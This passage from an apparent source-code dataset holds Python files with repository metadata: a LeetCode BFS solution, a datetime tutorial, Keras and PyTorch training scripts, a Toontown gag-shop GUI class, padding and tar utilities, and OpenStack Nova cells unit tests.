] | null | null | null | Leetcode/0417. Pacific Atlantic Water Flow/0417.py | Next-Gen-UI/Code-Dynamics | a9b9d5e3f27e870b3e030c75a1060d88292de01c | [
"MIT"
] | null | null | null | Leetcode/0417. Pacific Atlantic Water Flow/0417.py | Next-Gen-UI/Code-Dynamics | a9b9d5e3f27e870b3e030c75a1060d88292de01c | [
"MIT"
] | null | null | null | class Solution:
def pacificAtlantic(self, heights: List[List[int]]) -> List[List[int]]:
m = len(heights)
n = len(heights[0])
dirs = [0, 1, 0, -1, 0]
qP = deque()
qA = deque()
seenP = [[False] * n for _ in range(m)]
seenA = [[False] * n for _ in range(m)]
for i in range(m):
qP.append((i, 0))
qA.append((i, n - 1))
seenP[i][0] = True
seenA[i][n - 1] = True
for j in range(n):
qP.append((0, j))
qA.append((m - 1, j))
seenP[0][j] = True
seenA[m - 1][j] = True
def bfs(q: deque, seen: List[List[bool]]):
while q:
i, j = q.popleft()
h = heights[i][j]
for k in range(4):
x = i + dirs[k]
y = j + dirs[k + 1]
if x < 0 or x == m or y < 0 or y == n:
continue
if seen[x][y] or heights[x][y] < h:
continue
q.append((x, y))
seen[x][y] = True
bfs(qP, seenP)
bfs(qA, seenA)
return [[i, j] for i in range(m) for j in range(n) if seenP[i][j] and seenA[i][j]]
| 25.926829 | 86 | 0.4619 |
cc0bcceb460b5766a92238a74136043668625e7a | 823 | py | Python | Variado_GeekUniversity/guppe/deltas.py | PauloFTeixeira/curso_python | 9040c7dcc5262620f6330bb9637710bb8899bc6b | [
"MIT"
] | null | null | null | Variado_GeekUniversity/guppe/deltas.py | PauloFTeixeira/curso_python | 9040c7dcc5262620f6330bb9637710bb8899bc6b | [
"MIT"
] | null | null | null | Variado_GeekUniversity/guppe/deltas.py | PauloFTeixeira/curso_python | 9040c7dcc5262620f6330bb9637710bb8899bc6b | [
"MIT"
] | null | null | null | """
Trabalhando com deltas de data e hora
data_inicial = dd/mm/yyyy 12:55:34.9939329
data_final = dd/mm/yyyy 13:34.23.0948484
delta = data_final - data_inicial
import datetime
# Temos a data de hoje
data_hoje = datetime.datetime.now()
# Data para ocorrer um determinado evento no futuro
aniversario = datetime.datetime(2019, 3, 3, 0)
# calculando o delta
tempo_para_evento = aniversario - data_hoje
print(type(tempo_para_evento))
print(repr(tempo_para_evento))
print(tempo_para_evento)
print(f'Faltam {tempo_para_evento.days} dias, {tempo_para_evento.seconds // 60 // 60} horas...')
"""
import datetime
data_da_compra = datetime.datetime.now()
print(data_da_compra)
regra_boleto = datetime.timedelta(days=3)
print(regra_boleto)
vencimento_boleto = data_da_compra + regra_boleto
print(vencimento_boleto)
| 19.139535 | 96 | 0.771567 |
dddb6d79d92bbad951192c3cef5c2d3809fd9bf1 | 3,773 | py | Python | code/1-development/train.py | zacharyclam/speaker_recognition | 8daf3738b3ea7be03d7052112881df6885fbf1a5 | [
"Apache-2.0"
] | 37 | 2018-08-23T05:55:04.000Z | 2021-06-10T13:39:36.000Z | code/1-development/train.py | zacharyclam/speaker_recognition | 8daf3738b3ea7be03d7052112881df6885fbf1a5 | [
"Apache-2.0"
] | 8 | 2018-09-16T03:04:45.000Z | 2021-03-14T07:49:19.000Z | code/1-development/train.py | zacharyclam/speaker_recognition | 8daf3738b3ea7be03d7052112881df6885fbf1a5 | [
"Apache-2.0"
] | 15 | 2018-09-05T08:03:23.000Z | 2020-11-20T07:00:28.000Z | #!/usr/env/python python3
# -*- coding: utf-8 -*-
# @File : train.py
# @Time : 2018/8/12 12:49
# @Software : PyCharm
import os
import tensorflow as tf
from keras.optimizers import Adam
from keras.callbacks import ModelCheckpoint, TensorBoard, ReduceLROnPlateau
import keras.backend as K
import numpy as np
from model import construct_model
from data_feeder import generate_fit
root_dir = os.path.abspath(os.path.join(os.getcwd(), "../.."))
tf.flags.DEFINE_integer(
"batch_size", default=128,
help="Batch size (default: 128)")
tf.flags.DEFINE_integer(
"num_epochs", default=100,
help="Number of training epochs (defaule:100)")
tf.flags.DEFINE_integer(
"num_classes", default=340,
help="Number of training data classes (default:340)")
tf.flags.DEFINE_float(
"learn_rate", default=0.0001,
help="learn rate (default: 0.0001)")
tf.flags.DEFINE_string(
"category", default="train",
help="the category of data")
tf.flags.DEFINE_string(
"model_dir", default=os.path.join(root_dir, "model"),
help="the model file dir")
tf.flags.DEFINE_string(
"tensorboard_dir", default=os.path.join(root_dir, "logs"),
help="the tensorboard file dir")
tf.flags.DEFINE_string(
"datalist_dir", default=os.path.join(root_dir, "data/bin"),
help="the data list file dir")
# FLAGS 是一个对象,保存了解析后的命令行参数
FLAGS = tf.flags.FLAGS
# 进行解析
FLAGS.flag_values_dict()
if not os.path.exists(FLAGS.model_dir):
os.makedirs(FLAGS.model_dir)
if not os.path.exists(FLAGS.tensorboard_dir):
os.makedirs(FLAGS.tensorboard_dir)
# the paths
train_path = os.path.join(FLAGS.datalist_dir, "train_list.txt")
test_path = os.path.join(FLAGS.datalist_dir, "validate_list.txt")
# count the number of samples
f = open(train_path)
train_nums = len(f.readlines()) # number of train samples
f.close()
f = open(test_path)
test_nums = len(f.readlines()) # number of train samples
f.close()
if __name__ == '__main__':
# 指定使用显卡
os.environ["CUDA_VISIBLE_DEVICES"] = "1"
config = tf.ConfigProto()
config.gpu_options.per_process_gpu_memory_fraction = 0.90 # 占用GPU90%的显存
K.set_session(tf.Session(config=config))
# 创建模型
extract_feature_model, sr_model = construct_model(FLAGS.num_classes)
# 创建优化器
opt = Adam(lr=FLAGS.learn_rate, beta_1=0.9, beta_2=0.999, epsilon=1e-08)
sr_model.compile(loss='categorical_crossentropy', optimizer=opt, metrics=['accuracy'])
# 学习率衰减
reduce_lr = ReduceLROnPlateau(monitor='val_loss', factor=0.1, patience=10,
min_lr=1e-8, mode="min", cooldown=10, verbose=1)
tbCallBack = TensorBoard(log_dir=FLAGS.tensorboard_dir,
histogram_freq=0,
write_graph=True,
write_images=True)
checkpoint = ModelCheckpoint(filepath=os.path.join(FLAGS.model_dir, "checkpoint-{epoch:05d}-{val_acc:.2f}.h5"),
monitor='val_acc', verbose=2, save_best_only=True, mode='max')
# 开始训练
sr_model.fit_generator(generate_fit(train_path, FLAGS.batch_size, FLAGS.num_classes),
steps_per_epoch=np.ceil(train_nums / FLAGS.batch_size),
shuffle=True,
validation_data=generate_fit(test_path, FLAGS.batch_size, FLAGS.num_classes),
validation_steps=np.ceil(test_nums / FLAGS.batch_size),
epochs=FLAGS.num_epochs,
verbose=2,
callbacks=[reduce_lr, checkpoint, tbCallBack]
)
sr_model.save("spk.h5")
# usage
# nohup python3 -u train.py --batch_size=128 --num_epochs=1000 --learn_rate=0.0001 > logs.out 2>&1 &
| 31.974576 | 115 | 0.655447 |
a5f76d8b50d0f2e40da60cbb39df2fdd0fd87f7d | 5,814 | py | Python | toontown/minigame/PurchaseBase.py | CrankySupertoon01/Toontown-2 | 60893d104528a8e7eb4aced5d0015f22e203466d | [
"MIT"
] | 1 | 2021-02-13T22:40:50.000Z | 2021-02-13T22:40:50.000Z | toontown/minigame/PurchaseBase.py | CrankySupertoonArchive/Toontown-2 | 60893d104528a8e7eb4aced5d0015f22e203466d | [
"MIT"
] | 1 | 2018-07-28T20:07:04.000Z | 2018-07-30T18:28:34.000Z | toontown/minigame/PurchaseBase.py | CrankySupertoonArchive/Toontown-2 | 60893d104528a8e7eb4aced5d0015f22e203466d | [
"MIT"
] | 2 | 2019-12-02T01:39:10.000Z | 2021-02-13T22:41:00.000Z | from toontown.toonbase.ToontownBattleGlobals import *
from toontown.toonbase import ToontownGlobals
from direct.fsm import StateData
from toontown.shtiker.PurchaseManagerConstants import *
from direct.gui.DirectGui import *
from panda3d.core import *
from direct.task import Task
from direct.fsm import State
from direct.fsm import ClassicFSM, State
from toontown.toonbase import TTLocalizer
class PurchaseBase(StateData.StateData):
activateMode = 'purchase'
def __init__(self, toon, doneEvent):
StateData.StateData.__init__(self, doneEvent)
self.toon = toon
self.fsm = ClassicFSM.ClassicFSM('Purchase', [State.State('purchase', self.enterPurchase, self.exitPurchase, ['done']), State.State('done', self.enterDone, self.exitDone, ['purchase'])], 'done', 'done')
self.fsm.enterInitialState()
def load(self, purchaseModels = None):
if purchaseModels == None:
purchaseModels = loader.loadModel('phase_4/models/gui/purchase_gui')
self.music = base.loadMusic('phase_4/audio/bgm/FF_safezone.ogg')
self.jarImage = purchaseModels.find('**/Jar')
self.jarImage.reparentTo(hidden)
self.frame = DirectFrame(relief=None)
self.frame.hide()
self.title = DirectLabel(parent=self.frame, relief=None, pos=(0.0, 0.0, 0.83), scale=1.2, image=purchaseModels.find('**/Goofys_Sign'), text=TTLocalizer.GagShopName, text_fg=(0.6, 0.2, 0, 1), text_scale=0.09, text_wordwrap=10, text_pos=(0, 0.025, 0), text_font=ToontownGlobals.getSignFont())
self.pointDisplay = DirectLabel(parent=self.frame, relief=None, pos=(-1.15, 0.0, 0.16), text=str(self.toon.getMoney()), text_scale=0.2, text_fg=(0.95, 0.95, 0, 1), text_shadow=(0, 0, 0, 1), text_pos=(0, -0.1, 0), image=self.jarImage, text_font=ToontownGlobals.getSignFont())
self.statusLabel = DirectLabel(parent=self.frame, relief=None, pos=(-0.25, 0, 0.625), text=TTLocalizer.GagShopYouHave % self.toon.getMoney(), text_scale=TTLocalizer.PBstatusLabel, text_fg=(0.05, 0.14, 0.4, 1))
if self.toon.getMoney() == 1:
self.statusLabel['text'] = TTLocalizer.GagShopYouHaveOne
self.isBroke = 0
return
def unload(self):
self.jarImage.removeNode()
del self.jarImage
self.frame.destroy()
del self.frame
del self.title
del self.pointDisplay
del self.statusLabel
del self.music
del self.fsm
return
def __handleSelection(self, track, level):
self.handlePurchase(track, level)
def handlePurchase(self, track, level):
if self.toon.getMoney() <= 0:
return
ret = self.toon.inventory.addItem(track, level)
if ret == -3:
text = TTLocalizer.GagShopNotEnoughJellybeans
elif ret == -2:
text = TTLocalizer.GagShopTooManyProps
elif ret == -1:
text = TTLocalizer.GagShopTooManyOfThatGag % TTLocalizer.BattleGlobalAvPropStringsPlural[track][level]
elif ret == 0:
text = TTLocalizer.GagShopInsufficientSkill
else:
text = TTLocalizer.GagShopYouPurchased % TTLocalizer.BattleGlobalAvPropStringsSingular[track][level]
self.toon.inventory.updateGUI(track, level)
self.toon.setMoney(self.toon.getMoney() - 1)
messenger.send('boughtGag')
self.showStatusText(text)
def showStatusText(self, text):
self.statusLabel['text'] = text
taskMgr.remove('resetStatusText')
taskMgr.doMethodLater(2.0, self.resetStatusText, 'resetStatusText')
def resetStatusText(self, task):
self.statusLabel['text'] = ''
return Task.done
def checkForBroke(self):
money = self.toon.getMoney()
self.pointDisplay['text'] = str(money)
if money == 0:
if not self.isBroke:
self.toon.inventory.setActivateModeBroke()
taskMgr.doMethodLater(2.25, self.showBrokeMsg, 'showBrokeMsgTask')
self.isBroke = 1
else:
if self.isBroke:
self.toon.inventory.setActivateMode(self.activateMode)
taskMgr.remove('showBrokeMsgTask')
self.isBroke = 0
if money == 1:
self.statusLabel['text'] = TTLocalizer.GagShopYouHaveOne
else:
self.statusLabel['text'] = TTLocalizer.GagShopYouHave % money
def showBrokeMsg(self, task):
self.statusLabel['text'] = TTLocalizer.GagShopOutOfJellybeans
return Task.done
def handleDone(self, playAgain):
messenger.send(self.doneEvent, [playAgain])
def enter(self):
self.fsm.request('purchase')
def exit(self):
self.music.stop()
self.fsm.request('done')
def enterPurchase(self):
self.frame.show()
self.toon.inventory.enableUberGags(0)
self.toon.inventory.show()
self.toon.inventory.reparentTo(self.frame)
self.toon.inventory.setActivateMode(self.activateMode)
self.checkForBroke()
self.acceptOnce('purchaseOver', self.handleDone)
self.accept('inventory-selection', self.__handleSelection)
self.accept(self.toon.uniqueName('moneyChange'), self.__moneyChange)
def exitPurchase(self):
self.frame.hide()
self.toon.inventory.enableUberGags(1)
self.toon.inventory.reparentTo(hidden)
self.toon.inventory.hide()
self.ignore('purchaseOver')
self.ignore('inventory-selection')
self.ignore(self.toon.uniqueName('moneyChange'))
taskMgr.remove('resetStatusText')
taskMgr.remove('showBrokeMsgTask')
def __moneyChange(self, money):
self.checkForBroke()
def enterDone(self):
pass
def exitDone(self):
pass
| 40.943662 | 298 | 0.652907 |
0bd2b40a246df301b83bc1702e6f30cb75fcc469 | 5,613 | py | Python | classification/mnist_bilinear.py | elviswf/pytorch_cv | a7f11f857a0c1d5e5a807aeed5e594659212fba0 | [
"Apache-2.0"
] | null | null | null | classification/mnist_bilinear.py | elviswf/pytorch_cv | a7f11f857a0c1d5e5a807aeed5e594659212fba0 | [
"Apache-2.0"
] | null | null | null | classification/mnist_bilinear.py | elviswf/pytorch_cv | a7f11f857a0c1d5e5a807aeed5e594659212fba0 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
"""
@Time : 2018/2/5 15:48
@Author : Elvis
CUDA_VISIBLE_DEVICES=7 python mnist_bilinear.py
mnist_bilinear1
"""
import os
import argparse
import torch
from torch import nn
import torch.optim as optim
from torchvision import datasets, transforms
from torch.autograd import Variable
from torch.backends import cudnn
from models.basenet import bilinearNet
from utils.logger import progress_bar
# Learning rate parameters
BASE_LR = 0.001
NUM_CLASSES = 10 # set the number of classes in your dataset
DATA_DIR = "/home/elvis/code/data/mnist"
BATCH_SIZE = 32
IMAGE_SIZE = 28
MODEL_NAME = "mnist_bilinear1"
USE_GPU = torch.cuda.is_available()
MODEL_SAVE_FILE = MODEL_NAME + '.pth'
parser = argparse.ArgumentParser(description='PyTorch mnist_bilinear1 Training')
parser.add_argument('--lr', default=BASE_LR, type=float, help='learning rate')
parser.add_argument('--resume', '-r', action='store_true', default=False, help='resume from checkpoint')
parser.add_argument('--data', default=DATA_DIR, type=str, help='file path of the dataset')
args = parser.parse_args()
best_acc = 0.
start_epoch = 0
print("Model: " + MODEL_NAME)
if args.resume:
print("==> Resuming from checkpoint...")
checkpoint = torch.load("./checkpoints/" + MODEL_SAVE_FILE)
net = checkpoint["net"]
best_acc = checkpoint["acc"]
start_epoch = checkpoint["epoch"]
optimizer = checkpoint["optimizer"]
else:
print("==> Building model...")
net = bilinearNet(num_classes=NUM_CLASSES)
# print(torch_summarize(net))
# print(net)
if USE_GPU:
net.cuda()
cudnn.benchmark = True
log = open("./log/%s.txt" % MODEL_NAME, 'a')
print("==> Preparing data...")
kwargs = {'num_workers': 2, 'pin_memory': True} if USE_GPU else {}
train_loader = torch.utils.data.DataLoader(
datasets.MNIST(DATA_DIR, train=True, download=True,
transform=transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.1307,), (0.3081,))
])),
batch_size=BATCH_SIZE, shuffle=True, **kwargs)
test_loader = torch.utils.data.DataLoader(
datasets.MNIST(DATA_DIR, train=False, transform=transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.1307,), (0.3081,))
])),
batch_size=BATCH_SIZE, shuffle=True, **kwargs)
optimizer = optim.Adam(net.parameters())
criterion = nn.CrossEntropyLoss()
def train(epoch, net, optimizer):
print("\nEpoch: %d" % epoch)
net.train()
train_loss = 0
correct = 0
total = 0
# optimizer = lr_scheduler(optimizer, epoch, init_lr=0.002, decay_epoch=start_epoch)
for batch_idx, (inputs, targets) in enumerate(train_loader):
if USE_GPU:
inputs, targets = inputs.cuda(), targets.cuda()
inputs, targets = Variable(inputs), Variable(targets)
optimizer.zero_grad()
out = net(inputs)
loss = criterion(out, targets)
loss.backward()
optimizer.step()
train_loss += loss.data[0]
_, predicted = torch.max(out.data, 1)
total += targets.size(0)
correct += predicted.eq(targets.data).cpu().sum()
progress_bar(batch_idx, len(train_loader), "Loss: %.3f | Acc: %.3f%% (%d/%d)"
% (train_loss / (batch_idx + 1), 100. * correct / total, correct, total))
log.write(str(epoch) + ' ' + str(correct / total) + ' ')
def test(epoch, net):
global best_acc
net.eval()
test_loss, correct, total, loss = 0, 0, 0, 0
for batch_idx, (inputs, targets) in enumerate(test_loader):
if USE_GPU:
inputs, targets = inputs.cuda(), targets.cuda()
inputs, targets = Variable(inputs, volatile=True), Variable(targets)
out = net(inputs)
loss = criterion(out, targets)
test_loss = loss.data[0]
_, predicted = torch.max(out.data, 1)
total += targets.size(0)
correct += predicted.eq(targets.data).cpu().sum()
acc = 100. * correct / total
progress_bar(batch_idx, len(test_loader), 'Loss: %.3f | Acc: %.3f%% (%d/%d)'
% (test_loss / (batch_idx + 1), acc, correct, total))
log.write(str(correct / total) + ' ' + str(test_loss) + '\n')
log.flush()
acc = 100. * correct / total
if epoch > 9 and acc > best_acc:
print("Saving checkpoint")
state = {
'net': net,
'acc': acc,
'epoch': epoch,
'optimizer': optimizer
}
if not os.path.isdir("checkpoints"):
os.mkdir('checkpoints')
torch.save(state, "./checkpoints/" + MODEL_SAVE_FILE)
best_acc = acc
for param in net.parameters():
param.requires_grad = False
optim_params = list(net.bilinear1.parameters())
for param in optim_params:
param.requires_grad = True
epoch1 = 8
# optimizer = optim.Adagrad(optim_params, lr=0.001, weight_decay=0.005)
optimizer = optim.Adam(optim_params, weight_decay=0.0005)
if start_epoch < epoch1:
for epoch in range(start_epoch, epoch1):
train(epoch, net, optimizer)
test(epoch, net)
start_epoch = epoch1
for param in net.parameters():
param.requires_grad = True
optim_params = list(net.parameters())
# fc_params = list(map(id, net.fc2.parameters()))
# base_params = list(filter(lambda p: id(p) not in fc_params, net.parameters()))
optimizer = optim.SGD(optim_params, lr=0.0001, weight_decay=0.0005)
# optimizer = optim.Adagrad(optim_params, lr=0.001, weight_decay=0.0005)
for epoch in range(start_epoch, 200):
train(epoch, net, optimizer)
test(epoch, net)
log.close()
| 32.258621 | 104 | 0.64796 |
f6e519f319356b5efa69a9093179070fdbf64855 | 1,797 | py | Python | ende/Util.py | tmthydvnprt/ende | 7f487c994f670f02174b6fdffbcf59e461329d7f | [
"MIT"
] | null | null | null | ende/Util.py | tmthydvnprt/ende | 7f487c994f670f02174b6fdffbcf59e461329d7f | [
"MIT"
] | null | null | null | ende/Util.py | tmthydvnprt/ende | 7f487c994f670f02174b6fdffbcf59e461329d7f | [
"MIT"
] | null | null | null | """
ende.Util - Random utility functions
project : Ende
version : 0.1.0
status : development
modifydate : 2015-05-06 19:30:00 -0700
createdate : 2015-05-04 06:08:00 -0700
website : https://github.com/tmthydvnprt/ende
author : tmthydvnprt
email : tmthydvnprt@users.noreply.github.com
maintainer : tmthydvnprt
license : MIT
copyright : Copyright 2015, project
credits :
"""
# external dependancies
from math import ceil
import os
import tarfile
class EndeError(Exception):
"""error handler"""
pass
def str2ord(string):
""" returns the ord() of each character of a string as a list """
return [ord(c) for c in string]
def str_sum(string):
""" return the sum() of an ord() list """
return sum(str2ord(string))
def pad(message='', block_size=16):
""" returns a message padded to the appropriate block size """
pad_size = block_size - (len(message) % block_size)
padding = chr(pad_size) * pad_size
return message + padding
def unpad(message=''):
""" returns a message with padding removed, assumes chr(padSize) * padSize type padding """
return message[:-ord(message[-1])]
def b64len(num=1):
""" returns the length of base64 encoding length of n """
return int(4 * ceil(num / 3))
def ellipsis_truncate(message='', length=16):
"""truncate a string and add ellipsis if longer than constant"""
return message[:length] + '...' if len(message) > length else message[:length]
def make_tar(output, sources):
"""store test data as tar"""
with tarfile.open(output, 'w') as tar:
for source in sources:
tar.add(source, arcname=os.path.basename(source))
def open_tar(source):
"""open tar file"""
tar = tarfile.open(source, 'r')
tar.extractall()
tar.close()
| 24.283784 | 95 | 0.662215 |
e39f02bbf894512b5e64d8c7e5afd6328b5d574c | 33,035 | py | Python | nova/tests/unit/compute/test_compute_cells.py | adanin/nova | 1f74441680b4376cd401ecc0b0449b464cf7a5fb | [
"Apache-2.0"
] | 1 | 2019-04-22T06:25:26.000Z | 2019-04-22T06:25:26.000Z | nova/tests/unit/compute/test_compute_cells.py | woraser/nova | fc3890667e4971e3f0f35ac921c2a6c25f72adec | [
"Apache-2.0"
] | null | null | null | nova/tests/unit/compute/test_compute_cells.py | woraser/nova | fc3890667e4971e3f0f35ac921c2a6c25f72adec | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2012 Rackspace Hosting
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Tests For Compute w/ Cells
"""
import copy
import functools
import inspect
import ddt
import mock
from oslo_utils.fixture import uuidsentinel as uuids
from oslo_utils import timeutils
from nova import block_device
from nova.cells import manager
from nova.compute import api as compute_api
from nova.compute import cells_api as compute_cells_api
from nova.compute import flavors
from nova.compute import power_state
from nova.compute import utils as compute_utils
from nova.compute import vm_states
from nova import context
from nova.db import api as db
from nova.db.sqlalchemy import api as db_api
from nova.db.sqlalchemy import api_models
from nova import exception
from nova import objects
from nova.objects import fields as obj_fields
from nova import quota
from nova import test
from nova.tests.unit.compute import test_compute
from nova.tests.unit.compute import test_shelve
from nova.tests.unit import fake_instance
from nova.tests.unit.objects import test_flavor
ORIG_COMPUTE_API = None
FAKE_IMAGE_REF = uuids.image_ref
NODENAME = 'fakenode1'
NODENAME2 = 'fakenode2'
def stub_call_to_cells(context, instance, method, *args, **kwargs):
fn = getattr(ORIG_COMPUTE_API, method)
original_instance = kwargs.pop('original_instance', None)
if original_instance:
instance = original_instance
# Restore this in 'child cell DB'
db.instance_update(context, instance['uuid'],
dict(vm_state=instance['vm_state'],
task_state=instance['task_state']))
# Use NoopQuotaDriver in child cells.
saved_quotas = quota.QUOTAS
quota.QUOTAS = quota.QuotaEngine(
quota_driver=quota.NoopQuotaDriver())
compute_api.QUOTAS = quota.QUOTAS
try:
return fn(context, instance, *args, **kwargs)
finally:
quota.QUOTAS = saved_quotas
compute_api.QUOTAS = saved_quotas
def stub_cast_to_cells(context, instance, method, *args, **kwargs):
fn = getattr(ORIG_COMPUTE_API, method)
original_instance = kwargs.pop('original_instance', None)
if original_instance:
instance = original_instance
# Restore this in 'child cell DB'
db.instance_update(context, instance['uuid'],
dict(vm_state=instance['vm_state'],
task_state=instance['task_state']))
# Use NoopQuotaDriver in child cells.
saved_quotas = quota.QUOTAS
quota.QUOTAS = quota.QuotaEngine(
quota_driver=quota.NoopQuotaDriver())
compute_api.QUOTAS = quota.QUOTAS
try:
fn(context, instance, *args, **kwargs)
finally:
quota.QUOTAS = saved_quotas
compute_api.QUOTAS = saved_quotas
def deploy_stubs(stubs, api, original_instance=None):
call = stub_call_to_cells
cast = stub_cast_to_cells
if original_instance:
kwargs = dict(original_instance=original_instance)
call = functools.partial(stub_call_to_cells, **kwargs)
cast = functools.partial(stub_cast_to_cells, **kwargs)
stubs.Set(api, '_call_to_cells', call)
stubs.Set(api, '_cast_to_cells', cast)
@ddt.ddt
class CellsComputeAPITestCase(test_compute.ComputeAPITestCase):
def setUp(self):
self.flags(use_neutron=False)
super(CellsComputeAPITestCase, self).setUp()
global ORIG_COMPUTE_API
ORIG_COMPUTE_API = self.compute_api
self.flags(enable=True, group='cells')
def _fake_validate_cell(*args, **kwargs):
return
self.compute_api = compute_cells_api.ComputeCellsAPI()
self.stubs.Set(self.compute_api, '_validate_cell',
_fake_validate_cell)
deploy_stubs(self.stubs, self.compute_api)
def tearDown(self):
global ORIG_COMPUTE_API
self.compute_api = ORIG_COMPUTE_API
super(CellsComputeAPITestCase, self).tearDown()
def test_instance_metadata(self):
self.skipTest("Test is incompatible with cells.")
def _test_evacuate(self, force=None):
@mock.patch.object(compute_api.API, 'evacuate')
def _test(mock_evacuate):
instance = objects.Instance(uuid=uuids.evacuate_instance,
cell_name='fake_cell_name')
dest_host = 'fake_cell_name@fakenode2'
self.compute_api.evacuate(self.context, instance, host=dest_host,
force=force)
mock_evacuate.assert_called_once_with(
self.context, instance, 'fakenode2', force=force)
_test()
def test_error_evacuate(self):
self.skipTest("Test is incompatible with cells.")
def test_create_instance_sets_system_metadata(self):
self.skipTest("Test is incompatible with cells.")
def test_create_saves_flavor(self):
self.skipTest("Test is incompatible with cells.")
def test_create_instance_associates_security_groups(self):
self.skipTest("Test is incompatible with cells.")
@mock.patch('nova.objects.quotas.Quotas.check_deltas')
def test_create_instance_over_quota_during_recheck(
self, check_deltas_mock):
self.stub_out('nova.tests.unit.image.fake._FakeImageService.show',
self.fake_show)
# Simulate a race where the first check passes and the recheck fails.
fake_quotas = {'instances': 5, 'cores': 10, 'ram': 4096}
fake_headroom = {'instances': 5, 'cores': 10, 'ram': 4096}
fake_usages = {'instances': 5, 'cores': 10, 'ram': 4096}
exc = exception.OverQuota(overs=['instances'], quotas=fake_quotas,
headroom=fake_headroom, usages=fake_usages)
check_deltas_mock.side_effect = [None, exc]
inst_type = flavors.get_default_flavor()
# Try to create 3 instances.
self.assertRaises(exception.QuotaError, self.compute_api.create,
self.context, inst_type, self.fake_image['id'], min_count=3)
project_id = self.context.project_id
self.assertEqual(2, check_deltas_mock.call_count)
call1 = mock.call(self.context,
{'instances': 3, 'cores': inst_type.vcpus * 3,
'ram': inst_type.memory_mb * 3},
project_id, user_id=None,
check_project_id=project_id, check_user_id=None)
call2 = mock.call(self.context, {'instances': 0, 'cores': 0, 'ram': 0},
project_id, user_id=None,
check_project_id=project_id, check_user_id=None)
check_deltas_mock.assert_has_calls([call1, call2])
# Verify we removed the artifacts that were added after the first
# quota check passed.
instances = objects.InstanceList.get_all(self.context)
self.assertEqual(0, len(instances))
build_requests = objects.BuildRequestList.get_all(self.context)
self.assertEqual(0, len(build_requests))
@db_api.api_context_manager.reader
def request_spec_get_all(context):
return context.session.query(api_models.RequestSpec).all()
request_specs = request_spec_get_all(self.context)
self.assertEqual(0, len(request_specs))
instance_mappings = objects.InstanceMappingList.get_by_project_id(
self.context, project_id)
self.assertEqual(0, len(instance_mappings))
@mock.patch('nova.objects.quotas.Quotas.check_deltas')
def test_create_instance_no_quota_recheck(
self, check_deltas_mock):
self.stub_out('nova.tests.unit.image.fake._FakeImageService.show',
self.fake_show)
# Disable recheck_quota.
self.flags(recheck_quota=False, group='quota')
inst_type = flavors.get_default_flavor()
(refs, resv_id) = self.compute_api.create(self.context,
inst_type,
self.fake_image['id'])
self.assertEqual(1, len(refs))
project_id = self.context.project_id
# check_deltas should have been called only once.
check_deltas_mock.assert_called_once_with(self.context,
{'instances': 1,
'cores': inst_type.vcpus,
'ram': inst_type.memory_mb},
project_id, user_id=None,
check_project_id=project_id,
check_user_id=None)
@mock.patch.object(compute_api.API, '_local_delete')
@mock.patch.object(compute_api.API, '_lookup_instance',
return_value=(None, None))
def test_delete_instance_no_cell_instance_disappear(self, mock_lookup,
mock_local_delete):
inst = self._create_fake_instance_obj()
@mock.patch.object(self.compute_api.cells_rpcapi,
'instance_delete_everywhere')
def test(mock_inst_del):
self.compute_api.delete(self.context, inst)
mock_lookup.assert_called_once_with(self.context, inst.uuid)
mock_inst_del.assert_called_once_with(self.context, inst, 'hard')
self.assertFalse(mock_local_delete.called)
test()
@mock.patch.object(compute_api.API, '_local_delete')
def _test_delete_instance_no_cell(self, method_name, mock_local_delete):
cells_rpcapi = self.compute_api.cells_rpcapi
inst = self._create_fake_instance_obj()
delete_type = method_name == 'soft_delete' and 'soft' or 'hard'
@mock.patch.object(cells_rpcapi,
'instance_delete_everywhere')
@mock.patch.object(compute_api.API, '_lookup_instance',
return_value=(None, inst))
def test(mock_lookup, mock_inst_del):
self.stub_out('nova.network.api.deallocate_for_instance',
lambda *a, **kw: None)
getattr(self.compute_api, method_name)(self.context, inst)
mock_lookup.assert_called_once_with(self.context, inst.uuid)
mock_local_delete.assert_called_once_with(self.context, inst,
mock.ANY, method_name,
mock.ANY)
mock_inst_del.assert_called_once_with(self.context,
inst, delete_type)
test()
def test_delete_instance_no_cell_constraint_failure_does_not_loop(self):
inst = self._create_fake_instance_obj()
inst.cell_name = None
inst.destroy = mock.MagicMock()
inst.destroy.side_effect = exception.ObjectActionError(action='',
reason='')
inst.refresh = mock.MagicMock()
@mock.patch.object(self.compute_api.cells_rpcapi,
'instance_delete_everywhere')
@mock.patch.object(compute_api.API, '_lookup_instance',
return_value=(None, inst))
@mock.patch.object(objects.InstanceMapping, 'get_by_instance_uuid')
def _test(mock_get_im, _mock_lookup_inst, _mock_delete_everywhere):
self.assertRaises(exception.ObjectActionError,
self.compute_api.delete, self.context, inst)
inst.destroy.assert_called_once_with()
mock_get_im.assert_called_once_with(self.context, inst.uuid)
_test()
def test_delete_instance_no_cell_constraint_failure_corrects_itself(self):
def add_cell_name(context, instance, delete_type):
instance.cell_name = 'fake_cell_name'
inst = self._create_fake_instance_obj()
inst.cell_name = None
inst.destroy = mock.MagicMock()
inst.destroy.side_effect = exception.ObjectActionError(action='',
reason='')
inst.refresh = mock.MagicMock()
@mock.patch.object(compute_api.API, 'delete')
@mock.patch.object(self.compute_api.cells_rpcapi,
'instance_delete_everywhere', side_effect=add_cell_name)
@mock.patch.object(compute_api.API, '_lookup_instance',
return_value=(None, inst))
@mock.patch.object(objects.InstanceMapping, 'get_by_instance_uuid')
def _test(mock_get_im, _mock_lookup_inst, mock_delete_everywhere,
mock_compute_delete):
self.compute_api.delete(self.context, inst)
inst.destroy.assert_called_once_with()
mock_compute_delete.assert_called_once_with(self.context, inst)
mock_get_im.assert_called_once_with(self.context, inst.uuid)
_test()
def test_delete_instance_no_cell_destroy_fails_already_deleted(self):
# If the instance.destroy() is reached during _local_delete,
# it will raise ObjectActionError if the instance has already
# been deleted by a instance_destroy_at_top, and instance.refresh()
# will raise InstanceNotFound
instance = objects.Instance(context=self.context,
uuid=uuids.destroy_instance,
cell_name=None, host=None)
